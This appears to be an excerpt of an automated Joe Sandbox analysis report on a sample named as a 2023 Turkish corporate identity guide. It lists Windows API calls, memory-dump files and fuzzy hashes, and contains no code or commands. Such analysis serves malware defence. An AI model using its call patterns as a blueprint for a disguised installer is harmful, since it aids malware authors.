                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(00000000), ref: 704D2B6B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1148824635.00000000704D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 704D0000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1148761933.00000000704D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148866058.00000000704D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148910359.00000000704D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_704d0000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: 42c7257ec0f5a0ac0333bc8f2b04ec492acc3471dbfcb34aee70d79d4ab71b43
                                                                                                                                                • Instruction ID: a1c80bc173c4d9e4bebd9b9b54af0147b48a62225dcb5c59f7558c6fc02f30ef
                                                                                                                                                • Opcode Fuzzy Hash: 42c7257ec0f5a0ac0333bc8f2b04ec492acc3471dbfcb34aee70d79d4ab71b43
                                                                                                                                                • Instruction Fuzzy Hash: 58417072900204DFDB22DFA5DF66B5D37B5FB24368F30442AF70596310DA3DA8818B91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                                                  • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointerwsprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 327478801-0
                                                                                                                                                • Opcode ID: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                                                                                                • Instruction ID: 7f9197a1b1888ebfd6de04269447b21ffcaf0972564048b2e7bc6ee4a29003df
                                                                                                                                                • Opcode Fuzzy Hash: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                                                                                                • Instruction Fuzzy Hash: 29E06D71E04104AAD710EBA5AE098AEB768DB84318B24407FF201B50D1CA7949119E2D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                                                                                                                                • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                                                                                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                                                                                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNELBASE(704D505C,00000004,00000040,704D504C), ref: 704D29B1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1148824635.00000000704D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 704D0000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1148761933.00000000704D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148866058.00000000704D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148910359.00000000704D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_704d0000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: 29274501ae185d8a50da5691fe1475ccd73c8b17b02d22552cc2413ed89e2f2c
                                                                                                                                                • Instruction ID: c56e1ea22dda23804af1b49f1ad00f4be31f5507d6b34d9ed75d5b6dec66ea79
                                                                                                                                                • Opcode Fuzzy Hash: 29274501ae185d8a50da5691fe1475ccd73c8b17b02d22552cc2413ed89e2f2c
                                                                                                                                                • Instruction Fuzzy Hash: F3F0A5B2600280DFC352CF2A8C587093BE0B71A305B60857AE388D6261EB744444CB91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,004061B5,0042C228,00000000,?,?,Call,?), ref: 0040614B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Open
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                                                                                                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                • Opcode ID: 10905977528c235e703cb230d4aceb2daa77919a392825a775d9fd0059444441
                                                                                                                                                • Instruction ID: 6c8b7a7afc7aeb3e996b6e5dc2b2c32cd2e79b991574bcf3a276c199f91445cd
                                                                                                                                                • Opcode Fuzzy Hash: 10905977528c235e703cb230d4aceb2daa77919a392825a775d9fd0059444441
                                                                                                                                                • Instruction Fuzzy Hash: C1D01232B04100D7DB10DBA4AF4899D73A49B84369B344577E102F11D0D6B9D9416A29
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                                                                                • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                                                                                                                • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                                                                                • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,704D123B,?,704D12DF,00000019,704D11BE,-000000A0), ref: 704D1225
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1148824635.00000000704D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 704D0000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1148761933.00000000704D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148866058.00000000704D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148910359.00000000704D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_704d0000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                • Opcode ID: 861c238e3b4b86ef164b08623613f673c228f004c1ae98bfe7bccfc5ff6a8f9f
                                                                                                                                                • Instruction ID: 200002e8689228a6607aa476a0053b18f2487428f6e61334b3cc3ba624fff601
                                                                                                                                                • Opcode Fuzzy Hash: 861c238e3b4b86ef164b08623613f673c228f004c1ae98bfe7bccfc5ff6a8f9f
                                                                                                                                                • Instruction Fuzzy Hash: B3B00272A44100DFEF419B65CD46F353754E744705F544060F705D5595D56458148975
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                                  • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405636
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                                • ShowWindow.USER32(00000000,00000008), ref: 0040565F
                                                                                                                                                • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                                • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                                • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                                • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                • String ID: {
                                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                                • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                                                                                                                • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                                • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                                  • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
